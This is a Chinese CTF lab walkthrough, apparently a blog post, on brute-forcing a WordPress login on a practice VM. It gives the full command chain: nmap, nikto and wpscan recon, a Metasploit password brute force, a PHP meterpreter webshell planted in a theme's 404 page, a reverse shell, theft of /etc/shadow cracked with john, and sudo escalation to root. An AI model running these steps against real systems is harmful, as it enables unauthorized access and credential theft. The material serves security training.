ctf训练 web安全暴力破解
ctf训练 web安全暴力破解
暴力破解漏洞介绍
穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法。
Web安全中的暴力破解也是利用尝试所有的可能性最终获取正确的结果。
实验环境
一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/1jitlWbjJHfyzfvPEBVDhUw
提取码:x8cc
安装打开靶机(使用Oracle VM VirtualBox打开):
(注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)
接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台
使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机,靶机ip为192.168.43.46
本机ip为192.168.43.96
信息探测
扫描主机服务信息以及服务版本
– nmap -sV靶场IP地址
快速扫描主机全部信息
– nmap -T4 -A -v靶场IP地址
探测敏感信息
– nikto -host http://靶场lP地址:端口
深入挖掘
分析nmap .nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;
在这里发现可疑目录/secret/
使用浏览器打开http:/ /ip:port/敏感页面,查看敏感信息,找到可利用的位置;
这里http默认端口号为80,所以端口号可以省略不加
发现一个login,于是点击
发现了一个登录界面,所以我们就想着找用户名和密码
暴力破解
首先使用wpscan对用户名进行枚举
使用上面得到的信息,查看用户名
得到用户名为admin
接下来启动Metasploit -> msfconsole
选择模块
msf > use auxiliary/scanner/http/wordpress_login_enum
show options 查看参数
设置我们已知的用户名
msf auxiliary(wordpress_login_enum) > set username admin
设置密码文件
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
设置目标url
msf auxiliary(wordpress_login_enum) > set targeturi secret/
设置目标ip
msf auxiliary(wordpress_login_enum) > set rhosts 靶机ip
运行,开始破解
msf auxiliary(wordpress_login_enum) > run
破解成功,得到密码也是admin
使用破解好的密码登录系统
进入后台
上传webshell获取控制权
制作webshell
使用msfvenom制作shell代码,将代码复制下来
wordpress后台寻找上传点
appearance的editor,然后再点击右侧的404 Template,将代码替换为shell代码
退出当前模块
back使用监听模块
use exploit/multi/handler设置为php模式
set payload php/meterpreter/reverse_tcp查看参数
show options设置kali的ip
set LHOST 本机ip开始监听
run
执行shell,获取反弹shell。
http: //靶场IP/secret/wp-content /themes/twentysevernteen /404.php
查看系统信息 sysinfo
查看用户权限id
root权限
– Metasploit中利用返回shell 下载
download /etc/passwd
download /etc/shaclow
–将文件转换为join可以识别的文件格式
unshadow passwd shadow > cracked
– 使用john破解密码
john cracked
得到用户名marlinspike和密码marlinspike
优化终端
python -c “import pty;pty.spawn(’/bin/bash’)”
切换到marlinspike用户
su - marlinspike查看权限
sudo -l提权
sudo bash
获取Flag
一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag
这个靶机下没有flag值,结束!!!
总结
提权时可以抓取/etc/passwd和/etc/shadow,之后使用join来破解对应的密码,然后使用对应的用户名密码提升root权限;
对于wp的渗透中,启动对应的主题,然后在404页面上传shell ;
ctf训练 web安全暴力破解相关推荐
- ctf训练 web安全暴力破解
此次的方法叫做穷举法,也成为枚举法.就是把可能问题一一列举出来. 第一步同样是信息探测(包括敏感信息的探测) 信息探测 这次只说一下信息探测的以往的语法: 扫描主机服务信息以及服务版本 nmap -s ...
- web渗透—暴力破解
二.暴力破解(信息收集确定端口打开) 2.1 MySql数据库爆破 2.1.1 Kali-Hydra #hydra IP地址 -l 单个账户名 -P 字典路径 ...
- CTF训练 web安全SSI注入
如何从外部进入主机 SSI注入攻击简介 实验 (一)实验环境 (二)信息探测 (三)深入挖掘 (四)漏洞利用 (五)制作webshell (六)启动监听 (七)上传shell反弹shell (八)执行 ...
- i春秋CTF训练 Web 破译
Web 破译 题目内容:破译下面的密文: TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 W ...
- 暴力破解测试入门到放弃
▼ 更多精彩推荐,请关注我们 ▼ 免责声明:本文所用所测试的环境均为自己搭建并提醒小伙伴们切勿对未授权的系统进行测试. 本文原创作者:3s_Nwgeek 原创投稿详情:重金悬赏 | 合天原创投稿等你来 ...
- 暴力破解之绕过验证码(客户端)
来不及到博客上写文章了,把公众号的文章转发过来,欢迎大家关注我的公众号:小白学IT 大家好,我是阿里斯,一名IT行业小白.今天接着上一篇文章继续深入了解web端暴力破解漏洞,今天的主要内容是利用bur ...
- Web漏洞挖掘(一)登录认证模块的暴力破解实例
Web漏洞挖掘(一)登录认证模块的暴力破解实例 暴力破解的定义 暴力破解的分类 暴力破解的威胁 涉及的基础知识模块 相关硬件(高速GPU推荐) 基于Burp Suite的暴力破解实例 暴力破解的定义 ...
- Web安全之《SSH暴力破解》
<SSH暴力破解>作业 课程名称:<Web安全(一)> [要求] 概念越详细越好: 验证过程必要有截图和文字说明: 防护措施必须超过6条以上: 其余部分均可配文字简介叙述: 作 ...
- 【CTF】CTFHub------历年真题-暴力破解/word文件本质/图片修复/数据包分析一/滴答滴答/栅栏解救/磁盘恢复
文章目录 历年真题 暴力破解 word文件本质 图片修复 好孩子看不见 数据包分析一 滴答滴答 栅栏解救 磁盘恢复 相关知识 CTF中常见的文件头和文件尾 历年真题 暴力破解 1.下载题目附件,发现加 ...
最新文章
- Unity3D手机斗地主游戏开发实战(03)_地主牌显示和出牌逻辑
- 「回顾」网易数据基础平台建设
- LInux CentOS6 无人值守安装实例(原作)
- 參加microsoft主管信息論壇
- iOS Json解析框架之MJExtension使用详解
- 十五天精通WCF——第十三天 用WCF来玩Rest
- Android安全-代码安全1-ProGuard混淆处理
- 精心整理的10套最美Web前端新年特效---提前祝大家新年快乐(文末送书)
- vector初始化方法(待补充)
- 比google earth还好的实景地图
- xp系统网上邻居看不到局域网电脑_win7系统网上邻居看不到局域网中其他电脑的解决方法...
- gitee 搭建个人网站
- linux下自动更换壁纸软件,适用于Ubuntu 18.04的4款最佳壁纸自动切换软件
- vue封装qq表情包和符号表情的发送
- margin-top、padding-top的值为百分比
- 关于多极充磁磁环表面磁场分布的研发历程GM900系列表磁分布测量仪
- 小程序能用突发性t5服务器么,突发!微信放大招,开放50个小程序超级入口
- poj2502 SubWay
- python在pip安装pytorch时候killed
- 二的负三次方php中怎么表示什么,(-2)的负平方 (-3)的负三次方 是什么意思 各等于多少...
热门文章
- Cocos Creator一步一步实现重力球游戏,附完整代码
- 【STM32】STM32CUBEMX + ADC(单通道,双通道DMA)
- 关于出生日期、邮箱、上传下载操作的元素点分析
- 关于stm32定时器定时周期计算
- 网络安全技术第六章——第三节木马的攻击与防治(中木马现象、木马病毒概念结构、木马实施攻击过程、配置传播运行连接木马、远程控制、木马伪装手段、更换图标改名换姓文件捆绑出错显示网页嫁衣自我销毁邮件附件)
- Sovrin:技术落地可期,但推广难度较高
- 互联网经常提起‘中心化’和‘去中心化’是什么 ?
- 如何查看谷歌浏览器中保存的密码
- C++实现推箱子小游戏(源代码)
- 规则即代码:人话解读加密朋克智能合约